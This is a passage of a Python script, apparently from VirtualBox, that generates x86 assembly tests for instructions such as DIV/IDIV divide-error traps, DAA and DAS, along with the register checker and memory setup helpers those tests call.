oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.write(' push sAX\n');
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateDivideErrorTests(self, oGen):
""" Generate divide error tests (raises X86_XCPT_DE). """
oGen.write('%ifdef VBINSTST_CAN_DO_TRAPS\n');
# We do one register variation here, assuming the standard test has got them covered.
# Register tests
if True:
iOp2 = oGen.oTarget.randGRegNoSp();
while iOp2 == X86_GREG_xAX or iOp2 == X86_GREG_xDX:
iOp2 = oGen.oTarget.randGRegNoSp();
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u iOp2=%u\n' % (cbEffOp, iOp2,));
for iDividend, iDivisor in self.generateInputsXcpt(cbEffOp, fLong = not oGen.isTiny()):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneDivideErrorTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneDivideErrorTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
oGen.write('%endif ; VBINSTST_CAN_DO_TRAPS\n');
return True;
def generateTest(self, oGen, sTestFnName):
    """ Emits one complete test function: prologue, the standard tests, the #DE tests, epilogue. """
    # Function prologue.
    oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
    # Emit the regular register/memory tests first, then the divide-error ones.
    self.generateStandardTests(oGen);
    self.generateDivideErrorTests(oGen);
    # Function epilogue.
    oGen.write(' ret\n');
    oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
    return True;
class InstrTest_DaaDas(InstrTestBase):
    """ Tests the DAA and DAS instructions. """

    def __init__(self, fIsDas):
        # fIsDas selects DAS ('das') over DAA ('daa'); same loop structure for both.
        InstrTestBase.__init__(self, 'das' if fIsDas else 'daa');
        self.fIsDas = fIsDas;

    def isApplicable(self, oGen):
        # DAA/DAS are invalid in 64-bit mode.
        return not oGen.oTarget.is64Bit();

    def generateTest(self, oGen, sTestFnName):
        """ Emits a loop that replays precomputed DAA/DAS result tables (AL + flags). """
        # The expected-results tables are generated offline and shipped as modules.
        if self.fIsDas: from itgTableDas import g_aItgDasResults as aItgResults;
        else: from itgTableDaa import g_aItgDaaResults as aItgResults;
        cMax = len(aItgResults);
        if oGen.isTiny():
            cMax = 64;
        oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
        # ebx is the loop variable and doubles as the table index.
        oGen.write(' xor ebx, ebx\n');
        oGen.write('.das_loop:\n');
        # Save the loop variable so we can load known values.
        oGen.write(' push ebx\n');
        oGen.newSubTestEx('ebx');
        # Push the results.
        oGen.write(' movzx eax, byte [.abAlResults + ebx]\n');
        oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
        oGen.write(' push eax\n');
        oGen.write(' movzx eax, byte [.aFlagsResults + ebx]\n');
        oGen.write(' push eax\n');
        # Calc and push the inputs.
        oGen.write(' mov eax, ebx\n');
        oGen.write(' shr eax, 2\n');
        oGen.write(' and eax, 0ffh\n');
        oGen.write(' or eax, %#x\n' % (oGen.au32Regs[X86_GREG_xAX] & ~0xff,));
        oGen.write(' push eax\n');
        # Bits 0/1 of ebx encode the input CF/AF flag combination.
        oGen.write(' pushfd\n')
        oGen.write(' and dword [xSP], ~(X86_EFL_CF | X86_EFL_AF)\n');
        oGen.write(' mov al, bl\n');
        oGen.write(' and al, 2\n');
        oGen.write(' shl al, X86_EFL_AF_BIT - 1\n');
        oGen.write(' or [xSP], al\n');
        oGen.write(' mov al, bl\n');
        oGen.write(' and al, X86_EFL_CF\n');
        oGen.write(' or [xSP], al\n');
        # Load register values and do the test.
        oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
        oGen.write(' popfd\n');
        oGen.write(' pop eax\n');
        if self.fIsDas:
            oGen.write(' das\n');
        else:
            oGen.write(' daa\n');
        # Verify the results.
        fFlagsToCheck = X86_EFL_CF | X86_EFL_PF | X86_EFL_AF | X86_EFL_SF | X86_EFL_ZF;
        oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needFlagsGRegChecker(fFlagsToCheck, X86_GREG_xAX),));
        # Restore the loop variable and advance.
        oGen.write(' pop ebx\n');
        oGen.write(' inc ebx\n');
        oGen.write(' cmp ebx, %#x\n' % (cMax,));
        oGen.write(' jb .das_loop\n');
        oGen.write(' ret\n');
        # Local data: expected AL values and expected flags, indexed by ebx.
        oGen.write('.abAlResults:\n');
        for i in range(cMax):
            oGen.write(' db %#x\n' % (aItgResults[i][0],));
        oGen.write('.aFlagsResults:\n');
        for i in range(cMax):
            oGen.write(' db %#x\n' % (aItgResults[i][1],));
        oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
        return True;
##
# Instruction Tests.
#
# The full set of instruction test objects; _generateTests iterates this list
# and emits one assembly test function per applicable entry.
#
g_aoInstructionTests = [
    InstrTest_Mov_Gv_Ev(),
    InstrTest_MovSxD_Gv_Ev(),
    InstrTest_DivIDiv(fIsIDiv = False),
    InstrTest_DivIDiv(fIsIDiv = True),
    InstrTest_DaaDas(fIsDas = False),
    InstrTest_DaaDas(fIsDas = True),
];
class InstructionTestGen(object): # pylint: disable=R0902
    """
    Instruction Test Generator.
    """

    ## @name Test size
    ## @{
    ksTestSize_Large  = 'large';
    ksTestSize_Medium = 'medium';
    ksTestSize_Tiny   = 'tiny';
    ## @}
    # All valid --test-size values, used as the optparse choices list.
    kasTestSizes = ( ksTestSize_Large, ksTestSize_Medium, ksTestSize_Tiny );

    ## The prefix for the checker functions.
    ksCheckerPrefix = 'Common_Check_'
def __init__(self, oOptions):
    """
    Initializes the generator from the parsed command line options.

    The fixed "known" register values are randomized once here so that every
    generated file and checker function agrees on them.
    """
    self.oOptions = oOptions;
    self.oTarget  = g_dTargetEnvs[oOptions.sTargetEnv];

    # Calculate the number of output files.
    # Note: use floor division ('//') - plain '/' yields a float on Python 3,
    # which would break range(self.cFiles) in _generateTests.
    self.cFiles = 1;
    if len(g_aoInstructionTests) > self.oOptions.cInstrPerFile:
        self.cFiles = len(g_aoInstructionTests) // self.oOptions.cInstrPerFile;
        # Round up when the split doesn't come out even (ceiling division).
        if self.cFiles * self.oOptions.cInstrPerFile < len(g_aoInstructionTests):
            self.cFiles += 1;

    # Fix the known register values.
    self.au64Regs    = randUxxList(64, 16);
    self.au32Regs    = [(self.au64Regs[i] & UINT32_MAX) for i in range(8)];
    self.au16Regs    = [(self.au64Regs[i] & UINT16_MAX) for i in range(8)];
    self.auRegValues = self.au64Regs if self.oTarget.is64Bit() else self.au32Regs;

    # Declare state variables used while generating.
    self.oFile         = sys.stderr;   # current output stream; replaced per file
    self.iFile         = -1;
    self.sFile         = '';
    self._dCheckFns    = dict();       # checker name -> reference count
    self._dMemSetupFns = dict();       # mem setup name -> reference count
    self._d64BitConsts = dict();       # 64-bit constant -> reference count

    # State variables used while generating test convenientely placed here (lazy bird)...
    self.iModReg      = 0;
    self.iModRm       = 0;
    self.iSibBaseReg  = 0;
    self.iSibIndexReg = 0;
    self.iSibScale    = 1;
    # The ranges below control how many ModR/M and SIB combinations each
    # run covers; larger test sizes cover more combinations.
    if self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
        self._oModRegRange    = range(2);
        self._oModRegRange8   = range(2);
        self.oModRmRange      = range(2);
        self.cSibBasePerRun   = 1;
        self._cSibIndexPerRun = 2;
        self.oSibScaleRange   = range(1);
    elif self.oOptions.sTestSize == InstructionTestGen.ksTestSize_Medium:
        self._oModRegRange    = range( 5 if self.oTarget.is64Bit() else 4);
        self._oModRegRange8   = range( 6 if self.oTarget.is64Bit() else 4);
        self.oModRmRange      = range(5);
        self.cSibBasePerRun   = 5;
        self._cSibIndexPerRun = 4;
        self.oSibScaleRange   = range(2);
    else:
        self._oModRegRange    = range(16 if self.oTarget.is64Bit() else 8);
        self._oModRegRange8   = range(20 if self.oTarget.is64Bit() else 8);
        self.oModRmRange      = range(16 if self.oTarget.is64Bit() else 8);
        self.cSibBasePerRun   = 8;
        self._cSibIndexPerRun = 9;
        self.oSibScaleRange   = range(4);
    self.iSibIndexRange = 0;
#
# Methods used by instruction tests.
#
def write(self, sText):
    """ Writes to the current output file. """
    # NOTE(review): unicode() is a Python 2 builtin (needed for io.open text
    # streams there); under Python 3 this raises NameError - confirm which
    # interpreter this script targets.
    return self.oFile.write(unicode(sText));

def writeln(self, sText):
    """ Writes a line to the current output file. """
    self.write(sText);
    return self.write('\n');

def writeInstrBytes(self, abInstr):
    """
    Emits an instruction given as a sequence of bytes values.
    """
    # First byte opens the 'db' directive; the rest are comma separated.
    self.write(' db %#04x' % (abInstr[0],));
    for i in range(1, len(abInstr)):
        self.write(', %#04x' % (abInstr[i],));
    return self.write('\n');
def newSubTest(self):
    """
    Indicates that a new subtest has started.
    """
    # Record the generator source line as the subtest indicator so failures
    # can be traced back to the emitting python code.
    self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], __LINE__\n');
    return True;

def newSubTestEx(self, sIndicator):
    """
    Indicates that a new subtest has started.

    sIndicator is an assembly operand (register or immediate) whose value is
    stored as the subtest indicator instead of __LINE__.
    """
    self.write(' mov dword [VBINSTST_NAME(g_uVBInsTstSubTestIndicator) xWrtRIP], %s\n' % (sIndicator, ));
    return True;
def needGRegChecker(self, iReg1, iReg2 = None, iReg3 = None):
    """
    Records the need for a given register checker function, returning its label.

    The checker itself is emitted later by _generateFileFooter; here we only
    construct the name (underscore-joined register names) and bump the
    reference count.
    """
    if iReg2 is not None:
        if iReg3 is not None:
            sName = '%s_%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2], self.oTarget.asGRegs[iReg3],);
        else:
            sName = '%s_%s' % (self.oTarget.asGRegs[iReg1], self.oTarget.asGRegs[iReg2],);
    else:
        assert iReg3 is None;
        sName = '%s' % (self.oTarget.asGRegs[iReg1],);
    # Count the reference (dict.get avoids the separate first-use branch).
    self._dCheckFns[sName] = self._dCheckFns.get(sName, 0) + 1;
    return self.ksCheckerPrefix + sName;
def needFlagsGRegChecker(self, fFlagsToCheck, iReg1, iReg2 = None, iReg3 = None):
    """
    Records the need for a given rFLAGS + register checker function, returning its label.

    Also registers the underlying register-only checker, since the flags
    checker tail-jumps to it (see _generateFileFooter).
    """
    sWorkerName = self.needGRegChecker(iReg1, iReg2, iReg3);
    sName = 'eflags_%#x_%s' % (fFlagsToCheck, sWorkerName[len(self.ksCheckerPrefix):]);
    # Count the reference (dict.get avoids the separate first-use branch).
    self._dCheckFns[sName] = self._dCheckFns.get(sName, 0) + 1;
    return self.ksCheckerPrefix + sName;
def needGRegMemSetup(self, cAddrBits, cbEffOp, iBaseReg = None, offDisp = None, iIndexReg = None, iScale = 1):
    """
    Records the need for a given register checker function, returning its label.

    The name encodes the whole addressing mode; _generateMemSetupFunctions
    parses it back apart, so the format must stay in sync with that code.
    """
    assert cAddrBits in [64, 32, 16];
    assert cbEffOp in [8, 4, 2, 1];
    assert iScale in [1, 2, 4, 8];
    sName = '%ubit_U%u' % (cAddrBits, cbEffOp * 8,);
    if iBaseReg is not None:
        sName += '_%s' % (gregName(iBaseReg, cAddrBits),);
    sName += '_x%u' % (iScale,);
    if iIndexReg is not None:
        sName += '_%s' % (gregName(iIndexReg, cAddrBits),);
    if offDisp is not None:
        sName += '_%#010x' % (offDisp & UINT32_MAX, );
    # Count the reference (dict.get avoids the separate first-use branch).
    self._dMemSetupFns[sName] = self._dMemSetupFns.get(sName, 0) + 1;
    return 'Common_MemSetup_' + sName;
def need64BitConstant(self, uVal):
    """
    Records the need for a 64-bit constant, returning its label.
    These constants are pooled to attempt reduce the size of the whole thing.
    """
    assert uVal >= 0 and uVal <= UINT64_MAX;
    # Count the reference (dict.get avoids the separate first-use branch);
    # the pool itself is emitted by _generateFileFooter.
    self._d64BitConsts[uVal] = self._d64BitConsts.get(uVal, 0) + 1;
    return 'g_u64Const_0x%016x' % (uVal, );
def pushConst(self, uResult):
    """
    Emits a push constant value, taking care of high values on 64-bit hosts.
    """
    # 'push imm32' sign-extends, so values with bit 31 set must go through
    # the 64-bit constant pool on 64-bit targets.
    fNeedsConstPool = self.oTarget.is64Bit() and uResult >= 0x80000000;
    if fNeedsConstPool:
        self.write(' push qword [%s wrt rip]\n' % (self.need64BitConstant(uResult),));
    else:
        self.write(' push dword 0x%x\n' % (uResult,));
    return True;
def getDispForMod(self, iMod, cbAlignment = 1):
    """
    Get a set of address dispositions for a given addressing mode.
    The alignment restriction is for SIB scaling.
    """
    assert cbAlignment in [1, 2, 4, 8];
    # Mod 0: no displacement; mod 1: disp8 extremes; mod 2: disp32 extremes.
    # Positive extremes are rounded down to the requested alignment.
    if iMod == 0:
        return [ None, ];
    if iMod == 1:
        return [ 127 & ~(cbAlignment - 1), -128 ];
    assert iMod == 2;
    return [ 2147483647 & ~(cbAlignment - 1), -2147483648 ];
def getModRegRange(self, cbEffOp):
    """
    The Mod R/M register range varies with the effective operand size, for
    8-bit registers we have 4 more.
    """
    return self._oModRegRange8 if cbEffOp == 1 else self._oModRegRange;
def getSibIndexPerRun(self):
    """
    We vary the SIB index test range a little to try cover more operand
    combinations and avoid repeating the same ones.
    """
    # Advance the cyclic state (period 3); one phase uses one fewer index.
    self.iSibIndexRange = (self.iSibIndexRange + 1) % 3;
    if self.iSibIndexRange == 0:
        return self._cSibIndexPerRun - 1;
    return self._cSibIndexPerRun;
def isTiny(self):
    """ Checks if we're in tiny mode."""
    sSelectedSize = self.oOptions.sTestSize;
    return sSelectedSize == InstructionTestGen.ksTestSize_Tiny;

def isMedium(self):
    """ Checks if we're in medium mode."""
    sSelectedSize = self.oOptions.sTestSize;
    return sSelectedSize == InstructionTestGen.ksTestSize_Medium;
#
# Forwarding calls for oTarget to shorted typing and lessen the attacks
# on the right margin.
#

def gregNameBits(self, iReg, cBitsWide):
    """ Target: Get the name of a general register for the given size (in bits). """
    return self.oTarget.gregNameBits(iReg, cBitsWide);

def gregNameBytes(self, iReg, cbWide):
    """ Target: Get the name of a general register for the given size (in bytes). """
    return self.oTarget.gregNameBytes(iReg, cbWide);

def is64Bit(self):
    """ Target: Is the target 64-bit? """
    return self.oTarget.is64Bit();
#
# Internal machinery.
#

def _randInitIndexes(self):
    """
    Initializes the Mod R/M and SIB state index with random numbers prior
    to generating a test.

    Note! As with all other randomness and variations we do, we cannot
          test all combinations for each and every instruction so we try
          get coverage over time.
    """
    # Note: each randU8() call consumes the RNG stream, so the assignment
    # order below is part of the reproducible-seed behavior.
    self.iModReg        = randU8();
    self.iModRm         = randU8();
    self.iSibBaseReg    = randU8();
    self.iSibIndexReg   = randU8();
    self.iSibScale      = 1 << (randU8() & 3);
    self.iSibIndexRange = randU8();
    return True;
def _calcTestFunctionName(self, oInstrTest, iInstrTest):
"""
Calc a test function name for the given instruction test.
"""
sName = 'TestInstr%03u_%s' % (iInstrTest, oInstrTest.sName);
return sName.replace(',', '_').replace(' ', '_').replace('%', '_');
def _generateFileHeader(self, ):
    """
    Writes the file header.
    Raises exception on trouble.

    Emits: the file banner and env include, the global data variables, the
    64-bit known-value pool, and the Common_LoadKnownValues /
    Common_CheckKnownValues helper procedures.
    """
    self.write('; $Id: InstructionTestGen.py $\n'
               ';; @file %s\n'
               '; Autogenerate by %s %s. DO NOT EDIT\n'
               ';\n'
               '\n'
               ';\n'
               '; Headers\n'
               ';\n'
               '%%include "env-%s.mac"\n'
               % ( os.path.basename(self.sFile),
                   os.path.basename(__file__), __version__[11:-1],
                   self.oTarget.sName,
               ) );
    # Target environment specific init stuff.

    #
    # Global variables.
    #
    self.write('\n\n'
               ';\n'
               '; Globals\n'
               ';\n');
    self.write('VBINSTST_BEGINDATA\n'
               'VBINSTST_GLOBALNAME_EX g_pvLow16Mem4K, data hidden\n'
               ' dq 0\n'
               'VBINSTST_GLOBALNAME_EX g_pvLow32Mem4K, data hidden\n'
               ' dq 0\n'
               'VBINSTST_GLOBALNAME_EX g_pvMem4K, data hidden\n'
               ' dq 0\n'
               'VBINSTST_GLOBALNAME_EX g_uVBInsTstSubTestIndicator, data hidden\n'
               ' dd 0\n'
               '%ifdef VBINSTST_CAN_DO_TRAPS\n'
               'VBINSTST_TRAP_RECS_BEGIN\n'
               '%endif\n'
               'VBINSTST_BEGINCODE\n'
               );
    # 64-bit known values go into data since they can't be used as immediates.
    self.write('%ifdef RT_ARCH_AMD64\n');
    for i in range(len(g_asGRegs64)):
        self.write('g_u64KnownValue_%s: dq 0x%x\n' % (g_asGRegs64[i], self.au64Regs[i]));
    self.write('%endif\n\n')

    #
    # Common functions.
    #

    # Loading common values.
    self.write('\n\n'
               'VBINSTST_BEGINPROC Common_LoadKnownValues\n'
               '%ifdef RT_ARCH_AMD64\n');
    for i in range(len(g_asGRegs64NoSp)):
        if g_asGRegs64NoSp[i]:
            self.write(' mov %s, 0x%x\n' % (g_asGRegs64NoSp[i], self.au64Regs[i],));
    self.write('%else\n');
    for i in range(8):
        if g_asGRegs32NoSp[i]:
            self.write(' mov %s, 0x%x\n' % (g_asGRegs32NoSp[i], self.au32Regs[i],));
    self.write('%endif\n'
               ' ret\n'
               'VBINSTST_ENDPROC Common_LoadKnownValues\n'
               '\n');

    # Checking the known values; 64-bit compares against the data pool,
    # 32-bit can use immediates directly.
    self.write('VBINSTST_BEGINPROC Common_CheckKnownValues\n'
               '%ifdef RT_ARCH_AMD64\n');
    for i in range(len(g_asGRegs64NoSp)):
        if g_asGRegs64NoSp[i]:
            self.write(' cmp %s, [g_u64KnownValue_%s wrt rip]\n'
                       ' je .ok_%u\n'
                       ' push %u ; register number\n'
                       ' push %s ; actual\n'
                       ' push qword [g_u64KnownValue_%s wrt rip] ; expected\n'
                       ' call VBINSTST_NAME(Common_BadValue)\n'
                       '.ok_%u:\n'
                       % ( g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i, i, g_asGRegs64NoSp[i], g_asGRegs64NoSp[i], i,));
    self.write('%else\n');
    for i in range(8):
        if g_asGRegs32NoSp[i]:
            self.write(' cmp %s, 0x%x\n'
                       ' je .ok_%u\n'
                       ' push %u ; register number\n'
                       ' push %s ; actual\n'
                       ' push dword 0x%x ; expected\n'
                       ' call VBINSTST_NAME(Common_BadValue)\n'
                       '.ok_%u:\n'
                       % ( g_asGRegs32NoSp[i], self.au32Regs[i], i, i, g_asGRegs32NoSp[i], self.au32Regs[i], i,));
    self.write('%endif\n'
               ' ret\n'
               'VBINSTST_ENDPROC Common_CheckKnownValues\n'
               '\n');
    return True;
def _generateMemSetupFunctions(self): # pylint: disable=R0915
    """
    Generates the memory setup functions.

    Each name registered via needGRegMemSetup encodes an addressing mode
    (address size, operand size, optional base reg, scale, optional index
    reg, optional disp).  This method parses the name back apart and emits a
    procedure that stores the value (passed on the stack) at a memory
    location, then points the base/index registers at it so the instruction
    under test will address that location.
    """
    cDefAddrBits = self.oTarget.getDefAddrBits();
    for sName in self._dMemSetupFns:
        # Unpack it.
        asParams = sName.split('_');
        cAddrBits = int(asParams[0][:-3]); assert asParams[0][-3:] == 'bit';
        cEffOpBits = int(asParams[1][1:]); assert asParams[1][0] == 'U';
        if cAddrBits == 64: asAddrGRegs = g_asGRegs64;
        elif cAddrBits == 32: asAddrGRegs = g_asGRegs32;
        else: asAddrGRegs = g_asGRegs16;

        # Optional base register component.
        i = 2;
        iBaseReg = None;
        sBaseReg = None;
        if i < len(asParams) and asParams[i] in asAddrGRegs:
            sBaseReg = asParams[i];
            iBaseReg = asAddrGRegs.index(sBaseReg);
            i += 1

        # Mandatory scale component ('xN').
        # NOTE(review): 'iScale = iScale =' is a harmless duplicated assignment.
        assert i < len(asParams); assert asParams[i][0] == 'x';
        iScale = iScale = int(asParams[i][1:]); assert iScale in [1, 2, 4, 8], '%u %s' % (iScale, sName);
        i += 1;

        # Optional index register component.
        sIndexReg = None;
        iIndexReg = None;
        if i < len(asParams) and asParams[i] in asAddrGRegs:
            sIndexReg = asParams[i];
            iIndexReg = asAddrGRegs.index(sIndexReg);
            i += 1;

        # Optional 10-char hex displacement component.
        # NOTE(review): long() is Python 2 only - confirm target interpreter.
        u32Disp = None;
        if i < len(asParams) and len(asParams[i]) == 10:
            u32Disp = long(asParams[i], 16);
            i += 1;

        assert i == len(asParams), 'i=%d len=%d len[i]=%d (%s)' % (i, len(asParams), len(asParams[i]), asParams[i],);
        assert iScale == 1 or iIndexReg is not None;

        # Find a temporary register.
        iTmpReg1 = X86_GREG_xCX;
        while iTmpReg1 in [iBaseReg, iIndexReg]:
            iTmpReg1 += 1;

        # Prologue.
        self.write('\n\n'
                   '; cAddrBits=%s cEffOpBits=%s iBaseReg=%s u32Disp=%s iIndexReg=%s iScale=%s\n'
                   'VBINSTST_BEGINPROC Common_MemSetup_%s\n'
                   ' MY_PUSH_FLAGS\n'
                   ' push %s\n'
                   % ( cAddrBits, cEffOpBits, iBaseReg, u32Disp, iIndexReg, iScale,
                       sName, self.oTarget.asGRegs[iTmpReg1], ));

        # Figure out what to use.
        if cEffOpBits == 64:
            sTmpReg1 = g_asGRegs64[iTmpReg1];
            sDataVar = 'VBINSTST_NAME(g_u64Data)';
        elif cEffOpBits == 32:
            sTmpReg1 = g_asGRegs32[iTmpReg1];
            sDataVar = 'VBINSTST_NAME(g_u32Data)';
        elif cEffOpBits == 16:
            sTmpReg1 = g_asGRegs16[iTmpReg1];
            sDataVar = 'VBINSTST_NAME(g_u16Data)';
        else:
            assert cEffOpBits == 8; assert iTmpReg1 < 4;
            sTmpReg1 = g_asGRegs8Rex[iTmpReg1];
            sDataVar = 'VBINSTST_NAME(g_u8Data)';

        # Special case: reg + reg * [2,4,8]
        if iBaseReg == iIndexReg and iBaseReg is not None and iScale != 1:
            iTmpReg2 = X86_GREG_xBP;
            while iTmpReg2 in [iBaseReg, iIndexReg, iTmpReg1]:
                iTmpReg2 += 1;
            sTmpReg2 = self.gregNameBits(iTmpReg2, cAddrBits);
            self.write(' push sAX\n'
                       ' push %s\n'
                       ' push sDX\n'
                       % (self.oTarget.asGRegs[iTmpReg2],));
            if cAddrBits == 16:
                self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sTmpReg2,));
            else:
                self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sTmpReg2,));
            self.write(' add %s, 0x200\n' % (sTmpReg2,));
            self.write(' mov %s, %s\n' % (self.gregNameBits(X86_GREG_xAX, cAddrBits), sTmpReg2,));
            if u32Disp is not None:
                self.write(' sub %s, %d\n'
                           % ( self.gregNameBits(X86_GREG_xAX, cAddrBits), convU32ToSigned(u32Disp), ));
            # Divide the address by (scale + 1) so base + index*scale hits it.
            self.write(' xor edx, edx\n'
                       '%if xCB == 2\n'
                       ' push 0\n'
                       '%endif\n');
            self.write(' push %u\n' % (iScale + 1,));
            self.write(' div %s [xSP]\n' % ('qword' if cAddrBits == 64 else 'dword',));
            self.write(' sub %s, %s\n' % (sTmpReg2, self.gregNameBits(X86_GREG_xDX, cAddrBits),));
            self.write(' pop sDX\n'
                       ' pop sDX\n'); # sTmpReg2 is eff address; sAX is sIndexReg value.
            # Note! sTmpReg1 can be xDX and that's no problem now.
            self.write(' mov %s, [xSP + sCB*3 + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
            self.write(' mov [%s], %s\n' % (sTmpReg2, sTmpReg1,)); # Value in place.
            self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg2],));
            if iBaseReg == X86_GREG_xAX:
                self.write(' pop %s\n' % (self.oTarget.asGRegs[iTmpReg1],));
            else:
                self.write(' mov %s, %s\n' % (sBaseReg, self.gregNameBits(X86_GREG_xAX, cAddrBits),));
                self.write(' pop sAX\n');
        else:
            # Load the value and mem address, storing the value there.
            # Note! ASSUMES that the scale and disposition works fine together.
            sAddrReg = sBaseReg if sBaseReg is not None else sIndexReg;
            self.write(' mov %s, [xSP + sCB + MY_PUSH_FLAGS_SIZE + xCB]\n' % (sTmpReg1,));
            if cAddrBits >= cDefAddrBits:
                self.write(' mov [%s xWrtRIP], %s\n' % (sDataVar, sTmpReg1,));
                self.write(' lea %s, [%s xWrtRIP]\n' % (sAddrReg, sDataVar,));
            else:
                if cAddrBits == 16:
                    self.write(' mov %s, [VBINSTST_NAME(g_pvLow16Mem4K) xWrtRIP]\n' % (sAddrReg,));
                else:
                    self.write(' mov %s, [VBINSTST_NAME(g_pvLow32Mem4K) xWrtRIP]\n' % (sAddrReg,));
                self.write(' add %s, %s\n' % (sAddrReg, (randU16() << cEffOpBits) & 0xfff, ));
                self.write(' mov [%s], %s\n' % (sAddrReg, sTmpReg1, ));

            # Adjust for disposition and scaling.
            if u32Disp is not None:
                self.write(' sub %s, %d\n' % ( sAddrReg, convU32ToSigned(u32Disp), ));
            if iIndexReg is not None:
                if iBaseReg == iIndexReg:
                    assert iScale == 1;
                    assert u32Disp is None or (u32Disp & 1) == 0;
                    self.write(' shr %s, 1\n' % (sIndexReg,));
                elif sBaseReg is not None:
                    # Separate base/index: put a random value in the index
                    # register and compensate in the base register.
                    uIdxRegVal = randUxx(cAddrBits);
                    if cAddrBits == 64:
                        self.write(' mov %s, %u\n'
                                   ' sub %s, %s\n'
                                   ' mov %s, %u\n'
                                   % ( sIndexReg, (uIdxRegVal * iScale) & UINT64_MAX,
                                       sBaseReg, sIndexReg,
                                       sIndexReg, uIdxRegVal, ));
                    else:
                        assert cAddrBits == 32;
                        self.write(' mov %s, %u\n'
                                   ' sub %s, %#06x\n'
                                   % ( sIndexReg, uIdxRegVal, sBaseReg, (uIdxRegVal * iScale) & UINT32_MAX, ));
                elif iScale == 2:
                    assert u32Disp is None or (u32Disp & 1) == 0;
                    self.write(' shr %s, 1\n' % (sIndexReg,));
                elif iScale == 4:
                    assert u32Disp is None or (u32Disp & 3) == 0;
                    self.write(' shr %s, 2\n' % (sIndexReg,));
                elif iScale == 8:
                    assert u32Disp is None or (u32Disp & 7) == 0;
                    self.write(' shr %s, 3\n' % (sIndexReg,));
                else:
                    assert iScale == 1;

        # Set upper bits that's supposed to be unused.
        if cDefAddrBits > cAddrBits or cAddrBits == 16:
            if cDefAddrBits == 64:
                assert cAddrBits == 32;
                if iBaseReg is not None:
                    self.write(' mov %s, %#018x\n'
                               ' or %s, %s\n'
                               % ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
                                   g_asGRegs64[iBaseReg], g_asGRegs64[iTmpReg1],));
                if iIndexReg is not None and iIndexReg != iBaseReg:
                    self.write(' mov %s, %#018x\n'
                               ' or %s, %s\n'
                               % ( g_asGRegs64[iTmpReg1], randU64() & 0xffffffff00000000,
                                   g_asGRegs64[iIndexReg], g_asGRegs64[iTmpReg1],));
            else:
                assert cDefAddrBits == 32; assert cAddrBits == 16; assert iIndexReg is None;
                if iBaseReg is not None:
                    self.write(' or %s, %#010x\n'
                               % ( g_asGRegs32[iBaseReg], randU32() & 0xffff0000, ));

        # Epilogue.
        self.write(' pop %s\n'
                   ' MY_POP_FLAGS\n'
                   ' ret sCB\n'
                   'VBINSTST_ENDPROC Common_MemSetup_%s\n'
                   % ( self.oTarget.asGRegs[iTmpReg1], sName,));
def _generateFileFooter(self):
    """
    Generates file footer.

    Emits: the trap record terminator, every register/flags checker function
    that was registered via needGRegChecker / needFlagsGRegChecker, the
    memory setup functions, and the pooled 64-bit constants.
    """
    # Terminate the trap records.
    self.write('\n\n'
               ';\n'
               '; Terminate the trap records\n'
               ';\n'
               'VBINSTST_BEGINDATA\n'
               '%ifdef VBINSTST_CAN_DO_TRAPS\n'
               'VBINSTST_TRAP_RECS_END\n'
               '%endif\n'
               'VBINSTST_BEGINCODE\n');

    # Register checking functions.
    for sName in self._dCheckFns:
        asRegs = sName.split('_');
        sPushSize = 'dword';

        # Do we check eflags first.
        if asRegs[0] == 'eflags':
            asRegs.pop(0);
            sFlagsToCheck = asRegs.pop(0);
            # NOTE(review): the "stack.'" fragment below lacks a trailing \n,
            # so two comment lines end up on one line in the output.
            self.write('\n\n'
                       '; Check flags and then defers to the register-only checker\n'
                       '; To save space, the callee cleans up the stack.'
                       '; Ref count: %u\n'
                       'VBINSTST_BEGINPROC %s%s\n'
                       ' MY_PUSH_FLAGS\n'
                       ' push sAX\n'
                       ' mov sAX, [xSP + sCB]\n'
                       ' and sAX, %s\n'
                       ' cmp sAX, [xSP + xCB + sCB*2]\n'
                       ' je .equal\n'
                       % ( self._dCheckFns[sName], self.ksCheckerPrefix, sName,
                           sFlagsToCheck,));
            # Mismatch: report 0xef as pseudo register number for eflags.
            self.write(' push dword 0xef ; register number\n'
                       ' push sAX ; actual\n'
                       ' mov sAX, [xSP + xCB + sCB*4]\n'
                       ' push sAX ; expected\n'
                       ' call VBINSTST_NAME(Common_BadValue)\n');
            self.write('.equal:\n'
                       ' mov xAX, [xSP + sCB*2]\n' # Remove the expected eflags value from the stack frame.
                       ' mov [xSP + sCB*2 + xCB + sCB - xCB], xAX\n'
                       ' pop sAX\n'
                       ' MY_POP_FLAGS\n'
                       ' lea xSP, [xSP + sCB]\n'
                       ' jmp VBINSTST_NAME(Common_Check_%s)\n'
